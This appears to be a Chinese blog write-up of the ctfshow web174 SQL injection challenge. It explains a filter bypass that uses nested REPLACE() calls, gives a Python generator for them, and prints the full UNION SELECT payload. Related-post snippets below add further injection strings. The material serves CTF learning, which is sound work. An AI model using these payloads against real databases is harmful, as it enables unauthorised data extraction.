ctfshow web入门174

最新推荐文章于 2024-03-17 19:26:26 发布
最新推荐文章于 2024-03-17 19:26:26 发布
阅读量398 收藏
点赞数 1
文章标签: 数据库 sql web安全 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53095017/article/details/130844721
版权

 

 

题目给出了查询语句和返回逻辑

先看查询语句

$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";

这里能直接看出来是使用单引号进行绕过

是一个字符型注入

继续,查看返回逻辑


    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

这里如果返回数据中包含 `flag` 字样,或者包含数字0-9,则不会输出

这里的话有两种方法,第一种方法是盲注

这里不作介绍

这里介绍第二种更为取巧的方式

做字符替换

我们已知 flag 中只包含16进制数

也就是0-9 a-f

那么我们可以将 0替换为g

0->g

1->h

...

以此类推

好的,那么按照这个思路,要么写个脚本生成payload

要么自己一点一点手写

这里给出脚本

i = 0
s = f"replace(password,{i},'{chr(ord(str(i)) + 55)}')"
for i in range(1,10):
    s = f"replace({s},{i},'{chr(ord(str(i)) + 55)}')"
print(s)

如果需要脚本思路的话可以留言

我就再写一篇分享思路的

上面的代码需要python版本3.6以上

这种格式写起来代码运行效率高且看起来容易

这里再给一段低版本的代码

s = "replace(password,{},'{}')".format(i, chr(ord(str(i)) + 55))
for i in range(1, 10):
    s = "replace({},{},'{}')".format(s, i, chr(ord(str(i)) + 55))
print(s)

生成的payload长这样

replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,0,'g'),1,'h'),2,'i'),3,'j'),4,'k'),5,'l'),6,'m'),7,'n'),8,'o'),9,'p')

然后我们把这个拼接到注入语句内

' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,0,'g'),1,'h'),2,'i'),3,'j'),4,'k'),5,'l'),6,'m'),7,'n'),8,'o'),9,'p') from ctfshow_user4 -- qwe

最后,再把得到的flag复原

flag = 'ctfshow{dibcehal-abdb-kkhj-pplb-fddaleiohcgk}'
for i in range(10):
    flag = flag.replace(chr(ord(str(i)) + 55), str(i))
    print(str(i), chr(ord(str(i)) + 55))
print(flag)

复原之后

前缀 ctfshow 也被更改了

这里手动改一下改回来即可

因为flag每次打开环境都不一样

所以这里flag我就直接发出来了,也不影响。

Jt2312
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7013
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web171-174
akxnxbshai的博客
03-05 4898
Web 171 打开发现以下内容。 看到了一个查询语句,于是认真看了一下。 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 直接传入1,代码会变成 select username,password from user where username !='flag' and id ='1' li
ctfshow sql注入(174~184,187~188 ,比较简陋)
最新发布
pwfortune的博客
03-17 928
( ''%0a'' ''/**/'' ''%0b'' ''%09'' ''%0c'' ''()'' "%0d" “%00” ) ===>代替空格。第一种:1'union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23。密码为ffifdyop,bp抓包得到flag。第一种:'or'1'='1'--%0c。
CTFSHOW web入门——web174
m0_74093152的博客
04-02 415
得到了Y@CRmc@Bhvd@CtmZTAyOGNjMy@AiNDgzLTQ@ENWQtOTc@AOS@JxMDcyMmUzZjVjMDF@I。string_replacement:想要替换成的子字符串。查看函数,返回值把0-9的数字和flag给过滤了。string_expression:字符串表达式。string_pattern:想要查找的子字符串。可以先用base64进行加密。脚本替换回原来的flag。
ctfshow SQL注入Web171-174
m0_62584974的博客
04-25 1461
2022/4/24 SQL注入Web171 语法:查询表中的数据 查询所有行 命令: select <字段1,字段2,...> from < 表名 > where < 条件> 例如:查看表 MyClass 中所有数据 mysql> select * from MyClass;查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='fl.
CTFshow——web174-180(sql注入)
m0_73756016的博客
12-19 1011
这是用正则匹配检查是否有flag先闭合order by爆列数爆数据库名 和 表名有三个表名 一个一个试一下虽然过滤了flag 但是没事 把他的password全显示出来就行。
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow-web入门-sql
qq_43618536的博客
07-10 943
ctfshow-web入门-sql
每日10行代码174:ctfshow-crypto-easyrsa2 题目解答wp
天天卡丁的博客
07-21 278
就比如现实中,得到了一些信息,大家来解密,肯定也没有许多的提示信息,解密很重要的方法就是不断的尝试,去猜,所以ctf里的密码题目也是这样,没有那么多原因。知道把两个n去求下公约数,肯定是最早出这种类型题目的人想出来的,或者最早加密的人为了偷懒,更换模n时,没有重新去找p和q,而是沿用了以前的p或q。那么,再看看题目,给了两组n,e,c那有没有可能两个n有关系呢,可以试下他们有没有公约数,用libnum.gcd求了一下,发现两者还真有公约数,那就相当于对n做了因素分解。...
CTFSHOW web入门 sql注入 无过滤注入 web171-175
sinat_41572027的博客
07-07 1450
ctfshow web171-174
ctfshow sql入门174 175脚本
2202_75317918的博客
11-14 136
因为觉得脚本写的太烂了,二分法也迷迷糊糊的主要是python怎么学的那么烂!!再研究一下。
CTFshow刷题日记-WEB-SQL注入part1(171-184)
Love&Share
09-19 1058
SQL注入篇-共150道 mysql字符串函数 UPPER(s) 将字符串转换为大写 UCASE(s) 将字符串转换为大写 SUBSTRING(s, start, length) 从字符串 s 的 start 位置截取长度为 length 的子字符串 SUBSTRING_INDEX(s, delimiter, number) 返回从字符串 s 的第 number 个出现的分隔符 delimiter 之后的子串。 如果 number 是正数,返回第 number 个字符左边的字符串。
CTF-show-SQL注入-1
qq_52696970的博客
03-24 243
From: https://blog.csdn.net/qq_61237064/article/details/121421239 https://blog.csdn.net/weixin_48083470/article/details/119034415 CTF-show-sql注入1、web1712、web1723、web1734、web174 1、web171 在网页中给出的用户表中可以看到ID=3后,数据无法显示,这说明有三个字段数 判断字段后,首先查询数据库名字: ctfshow_web 1'
ctf_show笔记篇(web入门---sql注入)171-189
whale_waves的博客
03-12 931
例如:原理,flag是十六进制的,最大到f所以可以用后面的英文来替换。利用into outfile来将查询到的表的内容写入到服务器的文件里。但这种情况一般需要知道web的地址例如/var/www/html/再利用python或者其他或者人工逆向替换回来。
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1.了解Web基础知识,例如HTTP协议、HTML、CSS、JavaScript等。 2.学习Web漏洞,例如SQL注入、XSS、CSRF等。 3.掌握一些常用的Web工具,例如Burp Suite、sqlmap、dirbuster等。 4.多练习,多尝试,多思考。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值